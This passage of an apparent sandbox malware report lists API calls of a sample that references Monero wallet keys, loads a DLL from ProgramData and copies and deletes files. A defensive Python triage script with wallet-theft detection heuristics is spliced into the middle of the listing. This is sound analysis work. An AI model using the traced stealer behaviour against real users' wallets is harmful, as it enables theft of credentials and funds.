                                     • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: dllmain_raw$dllmain_crt_dispatch
                                    • String ID:
                                    • API String ID: 3136044242-0
                                    • Opcode ID: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                    • Instruction ID: 1b6fb0113bb7797c13620b75bec2ccf609f27ebe0a42a07bb6b84582c4245044
                                    • Opcode Fuzzy Hash: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                    • Instruction Fuzzy Hash: 74218173D3061AABDB239E55EC4196F3A69EB81790F065117FA09AB311D3308D42DBA0
                                    APIs
                                    • GetSystemTime.KERNEL32(?), ref: 00376C0C
                                    • sscanf.NTDLL ref: 00376C39
                                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00376C52
                                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00376C60
                                    • ExitProcess.KERNEL32 ref: 00376C7A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                     • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Time$System$File$ExitProcesssscanf
                                    • String ID:
                                    • API String ID: 2533653975-0
                                    • Opcode ID: 63f17657f50f075e0e23f29e3d3f428eb1e1bec260e209b335e60bbc4b2c7b46
                                    • Instruction ID: 9bd37f60752e4b3a39fa83c407c9afc326a58bc194aac017eb5737cf8aa0ae6d
                                    • Opcode Fuzzy Hash: 63f17657f50f075e0e23f29e3d3f428eb1e1bec260e209b335e60bbc4b2c7b46
                                    • Instruction Fuzzy Hash: 9321EDB5D14209ABCF55DFE4E8559EEB7B6BF48300F04852DF40AA3250EB349608CB64
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00377FC7
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00377FCE
                                    • RegOpenKeyExA.ADVAPI32(80000002,00F2B8F8,00000000,00020119,?), ref: 00377FEE
                                    • RegQueryValueExA.ADVAPI32(?,00F3D418,00000000,00000000,000000FF,000000FF), ref: 0037800F
                                    • RegCloseKey.ADVAPI32(?), ref: 00378022
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                     • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID:
                                    • API String ID: 3225020163-0
                                    • Opcode ID: 40ec8f73d1a84bdaf46f47569aecd8a14fd41772e4d5d22da26ebbf0f556713f
                                    • Instruction ID: 71db86d3df2cbc43587d714a31272c6f68a138d10c3f8680df8a2ce4db3c7124
                                    • Opcode Fuzzy Hash: 40ec8f73d1a84bdaf46f47569aecd8a14fd41772e4d5d22da26ebbf0f556713f
                                    • Instruction Fuzzy Hash: C1114FB1A84205BBD724CF94DD49FAFB7BDEB04B10F108119F615A7680D7B95904CBE1
                                    APIs
                                    • StrStrA.SHLWAPI(00F3DC98,00000000,00000000,?,00369F71,00000000,00F3DC98,00000000), ref: 003793FC
                                    • lstrcpyn.KERNEL32(00637580,00F3DC98,00F3DC98,?,00369F71,00000000,00F3DC98), ref: 00379420
                                    • lstrlen.KERNEL32(00000000,?,00369F71,00000000,00F3DC98), ref: 00379437
                                    • wsprintfA.USER32 ref: 00379457
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                     • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpynlstrlenwsprintf
                                    • String ID: %s%s
                                    • API String ID: 1206339513-3252725368
                                    • Opcode ID: c6cc746b0a0361b19e2ac22233d42461e50c4dfe0e3936f90cdefafffaa99caa
                                    • Instruction ID: f0f11fb84da2f5d23d593d8bed1597d923f207a350496fc660e5691279de42ae
                                    • Opcode Fuzzy Hash: c6cc746b0a0361b19e2ac22233d42461e50c4dfe0e3936f90cdefafffaa99caa
                                    • Instruction Fuzzy Hash: B401D2B661420CFFCB14DF98C954EAE7BB9EB44314F148248F90D9B244DB31AA50DBD0
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003612B4
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 003612BB
                                    • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 003612D7
                                    • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 003612F5
                                    • RegCloseKey.ADVAPI32(?), ref: 003612FF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                     • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID:
                                    • API String ID: 3225020163-0
                                    • Opcode ID: 146659e22715eaf87f63a959968e3f426d29414a5a2e2876748a011defb24671
                                    • Instruction ID: 2c7512ed4537fac1f2aa3cfdf76e4b5df82ab60e5e7d820fe8fb76cb903abf2d
                                    • Opcode Fuzzy Hash: 146659e22715eaf87f63a959968e3f426d29414a5a2e2876748a011defb24671
                                    • Instruction Fuzzy Hash: 6501E1B9A44209BFDB14DFD4DC49FAE77B9EB48701F108195FA0597280D770AA00DB90
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: String___crt$Type
                                    • String ID:
                                    • API String ID: 2109742289-3916222277
                                    • Opcode ID: 6706b96ef15449a33c9d8bd3e10eb909b422f611ff35504a89f897f69d1805d3
                                    • Instruction ID: c0723d4ce33b9c9d032fa419790cf203e943e3536d563c378be184a6766e29f3
                                    • Opcode Fuzzy Hash: 6706b96ef15449a33c9d8bd3e10eb909b422f611ff35504a89f897f69d1805d3
                                    • Instruction Fuzzy Hash: 0F4105B101079C9EDB338B248C85FFBBBECAB45704F1484ECE98E96142D2359A459F20
                                    APIs
                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00376903
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                      • Part of subcall function 0037ACC0: lstrlen.KERNEL32(?,00F38980,?,\Monero\wallet.keys,00380E1A), ref: 0037ACD5
                                      • Part of subcall function 0037ACC0: lstrcpy.KERNEL32(00000000), ref: 0037AD14
                                      • Part of subcall function 0037ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AD22
                                      • Part of subcall function 0037ABB0: lstrcpy.KERNEL32(?,00380E1A), ref: 0037AC15
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 003769C6
                                    • ExitProcess.KERNEL32 ref: 003769F5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                    • String ID: <
                                    • API String ID: 1148417306-4251816714
                                    • Opcode ID: fb9e9db7f39746ff0c1ccf44ae71b415642062b1d30d6be059269644c6e28596
                                    • Instruction ID: 8e41ff16aff07083a78aa6494b15b5003b9266a30b4b6b1d52831366d58f0b2e
                                    • Opcode Fuzzy Hash: fb9e9db7f39746ff0c1ccf44ae71b415642062b1d30d6be059269644c6e28596
                                    • Instruction Fuzzy Hash: C03161F1901218ABDB26EB90DC95FDEB779AF44300F409188F2096B191DF746B48CFA9
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00380E10,00000000,?), ref: 003789BF
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 003789C6
                                    • wsprintfA.USER32 ref: 003789E0
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateProcesslstrcpywsprintf
                                    • String ID: %dx%d
                                    • API String ID: 1695172769-2206825331
                                    • Opcode ID: 0fac883b8829000d245379df29311f96015ceb7f5d7feff43b19c2b022ba708b
                                    • Instruction ID: ce3aa1d3ec7aaa3d21429ae7e06896a5cd1f193d2f11d7d27e73c56714e14b7b
                                    • Opcode Fuzzy Hash: 0fac883b8829000d245379df29311f96015ceb7f5d7feff43b19c2b022ba708b
                                    • Instruction Fuzzy Hash: A6214FB1A44208EFDB14DFD4DD45FAEBBB9FB48B11F108159FA15A7280C775A900CBA4
                                    APIs
                                    • LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 0036A098
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
                                    • API String ID: 1029625771-1545816527
                                    • Opcode ID: ca2a522940a18642c22f5990dbd4dd549658a775c00ec71feb92d16585eee141
                                    • Instruction ID: 74f30c44191c40d7966c1644b08b01b4a8fdf540918dd5aee4e38e736a51f576
                                    • Opcode Fuzzy Hash: ca2a522940a18642c22f5990dbd4dd549658a775c00ec71feb92d16585eee141
                                    • Instruction Fuzzy Hash: 77F0B4F054D304AFD73AAB64EC84B5537AAE305304F102454F005A75A0CBB5A8C5EFE2
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,003796AE,00000000), ref: 00378EEB
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00378EF2
                                    • wsprintfW.USER32 ref: 00378F08
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateProcesswsprintf
                                    • String ID: %hs
                                    • API String ID: 769748085-2783943728
                                    • Opcode ID: 2f147f417fda73f67706d9f9b921cd9f8e9440ea4522eface4e0b0d867bd2f3f
                                    • Instruction ID: d1f61c1d182ab2a093e5a3a2fe936c7bd1c788d7fb564c5482e50519752fc720
                                    • Opcode Fuzzy Hash: 2f147f417fda73f67706d9f9b921cd9f8e9440ea4522eface4e0b0d867bd2f3f
                                    • Instruction Fuzzy Hash: 7DE0ECB5A48309BBDB24DB94DD0AE6E77B9EB05702F001194FD0997340DA719F10DBD5
                                    APIs
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                      • Part of subcall function 0037ACC0: lstrlen.KERNEL32(?,00F38980,?,\Monero\wallet.keys,00380E1A), ref: 0037ACD5
                                      • Part of subcall function 0037ACC0: lstrcpy.KERNEL32(00000000), ref: 0037AD14
                                      • Part of subcall function 0037ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AD22
                                      • Part of subcall function 0037ABB0: lstrcpy.KERNEL32(?,00380E1A), ref: 0037AC15
                                      • Part of subcall function 00378CF0: GetSystemTime.KERNEL32(00380E1B,00F39A38,003805B6,?,?,003613F9,?,0000001A,00380E1B,00000000,?,00F38980,?,\Monero\wallet.keys,00380E1A), ref: 00378D16
                                      • Part of subcall function 0037AC30: lstrcpy.KERNEL32(00000000,?), ref: 0037AC82
                                      • Part of subcall function 0037AC30: lstrcat.KERNEL32(00000000), ref: 0037AC92
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0036AA11
                                    • lstrlen.KERNEL32(00000000,00000000), ref: 0036AB2F
                                    • lstrlen.KERNEL32(00000000), ref: 0036ADEC
                                      • Part of subcall function 0037AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0037AAF6
                                    • DeleteFileA.KERNEL32(00000000), ref: 0036AE73
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: 7f1705034202c309b0cc34c0cbd0c80651956836855930f3957c9fb7ad81d743
                                    • Instruction ID: d4996167a8404c794f62f11837e4210781b62bcc0cb0df4c7fc598f184dd503d
                                    • Opcode Fuzzy Hash: 7f1705034202c309b0cc34c0cbd0c80651956836855930f3957c9fb7ad81d743
                                    • Instruction Fuzzy Hash: 0FE1E4729105089BCB26FBA4DDA2EEE737DAF54300F50C559F11B76091EF346A48CB62
                                    APIs
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                      • Part of subcall function 0037ACC0: lstrlen.KERNEL32(?,00F38980,?,\Monero\wallet.keys,00380E1A), ref: 0037ACD5
                                      • Part of subcall function 0037ACC0: lstrcpy.KERNEL32(00000000), ref: 0037AD14
                                      • Part of subcall function 0037ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AD22
                                      • Part of subcall function 0037ABB0: lstrcpy.KERNEL32(?,00380E1A), ref: 0037AC15
                                      • Part of subcall function 00378CF0: GetSystemTime.KERNEL32(00380E1B,00F39A38,003805B6,?,?,003613F9,?,0000001A,00380E1B,00000000,?,00F38980,?,\Monero\wallet.keys,00380E1A), ref: 00378D16
                                      • Part of subcall function 0037AC30: lstrcpy.KERNEL32(00000000,?), ref: 0037AC82
                                      • Part of subcall function 0037AC30: lstrcat.KERNEL32(00000000), ref: 0037AC92
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0036D581
                                    • lstrlen.KERNEL32(00000000), ref: 0036D798
                                    • lstrlen.KERNEL32(00000000), ref: 0036D7AC
                                    • DeleteFileA.KERNEL32(00000000), ref: 0036D82B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: 4fd5af784a837cc27522528849278a719f3217e3bf46a39cc3af26f33be118cf
                                    • Instruction ID: 8b24f31502522f19bcfe3068071278a8221ca92244807ea83dfd2c0e8fb68a34
                                    • Opcode Fuzzy Hash: 4fd5af784a837cc27522528849278a719f3217e3bf46a39cc3af26f33be118cf
                                    • Instruction Fuzzy Hash: 1891FB729105049BCB26FBA4DCA6DEE737DAF54300F50C559F11B7A091EF346A08CB62
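The function entries above carry the behaviour worth triaging in this report: RegOpenKeyExA at 003612D7 with samDesired 00020119, GetModuleFileNameA followed by ShellExecuteEx and ExitProcess at 00376903, LoadLibraryA of C:\ProgramData\chrome.dll at 0036A098 with the strings connect_to_websocket and free_result, and the CopyFileA/DeleteFileA pairs at 0036AA11, 0036D581 and 0036D901 whose subcalls reference \Monero\wallet.keys. The script below is an added example, not Joe Sandbox or Stealc code: it parses the "• Api.MODULE(args), ref: addr" lines of this listing format, decodes the registry access mask with the Windows SDK KEY_* values (0x20119 is KEY_READ | KEY_WOW64_64KEY, i.e. the 32-bit code explicitly asking for the 64-bit registry view), and flags the patterns listed above. The sample text is excerpted from the entries on this page; the writable-directory list and the wallet markers are heuristic choices of mine, not report data.

```python
"""Triage helper for Joe Sandbox per-function API listings (added example)."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# One report line: "• [Part of subcall function XXXXXXXX: ]Api.MODULE(args), ref: XXXXXXXX"
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$",
    re.IGNORECASE)
STRING_ID_LINE = re.compile(r"^\s*•\s*String ID:\s*(?P<ids>.*)$")

# Registry access rights as defined in winnt.h / winreg.h
KEY_BITS = {0x1: "KEY_QUERY_VALUE", 0x2: "KEY_SET_VALUE", 0x4: "KEY_CREATE_SUB_KEY",
            0x8: "KEY_ENUMERATE_SUB_KEYS", 0x10: "KEY_NOTIFY", 0x20: "KEY_CREATE_LINK",
            0x100: "KEY_WOW64_64KEY", 0x200: "KEY_WOW64_32KEY", 0x10000: "DELETE",
            0x20000: "READ_CONTROL", 0x40000: "WRITE_DAC", 0x80000: "WRITE_OWNER"}
KEY_COMPOSITES = [(0xF003F, "KEY_ALL_ACCESS"), (0x20019, "KEY_READ"), (0x20006, "KEY_WRITE")]
# Heuristics (assumption): user-writable drop locations and wallet path fragments
WRITABLE_DIRS = ("c:\\programdata", "\\appdata\\", "\\temp\\", "c:\\users\\public")
WALLET_MARKERS = ("wallet", "\\monero\\")


def decode_key_access(mask: int) -> List[str]:
    """Name the rights in a RegOpenKeyEx samDesired value, composite names first."""
    names, rest = [], mask
    for value, name in KEY_COMPOSITES:
        if rest & value == value:
            names.append(name)
            rest &= ~value
    for bit, name in sorted(KEY_BITS.items()):
        if rest & bit:
            names.append(name)
            rest &= ~bit
    if rest:                      # bits this table does not know
        names.append(f"0x{rest:X}")
    return names


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: str
    subcall: Optional[str] = None   # set when the line is "Part of subcall function"


@dataclass
class Function:
    calls: List[ApiCall] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)

    def direct(self, *apis: str) -> List[ApiCall]:
        return [c for c in self.calls if c.subcall is None and c.api in apis]


def parse_functions(text: str) -> List[Function]:
    """Split a report excerpt at every 'APIs' header into per-function records."""
    functions: List[Function] = []
    current: Optional[Function] = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = Function()
            functions.append(current)
            continue
        if current is None:
            continue
        m = API_LINE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            current.calls.append(ApiCall(m["api"], m["module"], args, m["ref"].upper(),
                                         m["sub"].upper() if m["sub"] else None))
        s = STRING_ID_LINE.match(line)
        if s and s["ids"].strip():
            current.strings = s["ids"].strip().split("$")   # report joins strings with '$'
    return [f for f in functions if f.calls]


def triage(func: Function) -> List[str]:
    """Findings for one function: DLL from writable dir, registry mask, copy+delete, relaunch."""
    findings: List[str] = []
    anchor = next((c.ref for c in func.calls if c.subcall is None), func.calls[0].ref)
    for c in func.direct("LoadLibraryA", "LoadLibraryW"):
        path = c.args[0].lower() if c.args else ""
        if any(d in path for d in WRITABLE_DIRS):
            note = f"{c.ref}: LoadLibrary from user-writable path {c.args[0]}"
            if func.strings:
                note += "; strings in function: " + ", ".join(func.strings)
            findings.append(note)
    for c in func.direct("RegOpenKeyExA", "RegOpenKeyExW"):
        if len(c.args) > 3 and re.fullmatch(r"[0-9A-Fa-f]{8}", c.args[3]):
            mask = int(c.args[3], 16)
            findings.append(f"{c.ref}: RegOpenKeyEx samDesired=0x{mask:X} -> "
                            + "|".join(decode_key_access(mask)))
    if func.direct("CopyFileA", "CopyFileW") and func.direct("DeleteFileA", "DeleteFileW"):
        wallet = sorted({a for c in func.calls for a in c.args
                         if any(m in a.lower() for m in WALLET_MARKERS)})
        note = f"{anchor}: CopyFile followed by DeleteFile in the same function"
        if wallet:
            note += " (wallet artefacts referenced: " + ", ".join(wallet) + ")"
        findings.append(note)
    if func.direct("ShellExecuteEx", "ShellExecuteExA", "ShellExecuteExW") and func.direct("ExitProcess"):
        note = f"{anchor}: ShellExecuteEx followed by ExitProcess"
        if func.direct("GetModuleFileNameA", "GetModuleFileNameW"):
            note += " after resolving its own image path"
        findings.append(note)
    return findings


def triage_report(text: str) -> List[str]:
    return [f for fn in parse_functions(text) for f in triage(fn)]


# Excerpt of the report entries above (four functions, abbreviated)
SAMPLE = r"""
APIs
• RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 003612D7
• RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 003612F5
• RegCloseKey.ADVAPI32(?), ref: 003612FF
APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00376903
  • Part of subcall function 0037ACC0: lstrlen.KERNEL32(?,00F38980,?,\Monero\wallet.keys,00380E1A), ref: 0037ACD5
• ShellExecuteEx.SHELL32(0000003C), ref: 003769C6
• ExitProcess.KERNEL32 ref: 003769F5
APIs
• LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 0036A098
• String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
APIs
  • Part of subcall function 0037ACC0: lstrlen.KERNEL32(?,00F38980,?,\Monero\wallet.keys,00380E1A), ref: 0037ACD5
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0036AA11
• lstrlen.KERNEL32(00000000,00000000), ref: 0036AB2F
• DeleteFileA.KERNEL32(00000000), ref: 0036AE73
"""

if __name__ == "__main__":
    for finding in triage_report(SAMPLE):
        print(finding)
```

Run it against a larger copy of the listing by pasting the text into SAMPLE or reading it from a file; every finding carries the function's ref address so it can be located in the report. The registry decoding is exact (SDK constants); the other three rules are triage heuristics and should be read as prompts to look at the function, not as verdicts.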
                                    APIs
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                      • Part of subcall function 0037ACC0: lstrlen.KERNEL32(?,00F38980,?,\Monero\wallet.keys,00380E1A), ref: 0037ACD5
                                      • Part of subcall function 0037ACC0: lstrcpy.KERNEL32(00000000), ref: 0037AD14
                                      • Part of subcall function 0037ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AD22
                                      • Part of subcall function 0037ABB0: lstrcpy.KERNEL32(?,00380E1A), ref: 0037AC15
                                      • Part of subcall function 00378CF0: GetSystemTime.KERNEL32(00380E1B,00F39A38,003805B6,?,?,003613F9,?,0000001A,00380E1B,00000000,?,00F38980,?,\Monero\wallet.keys,00380E1A), ref: 00378D16
                                      • Part of subcall function 0037AC30: lstrcpy.KERNEL32(00000000,?), ref: 0037AC82
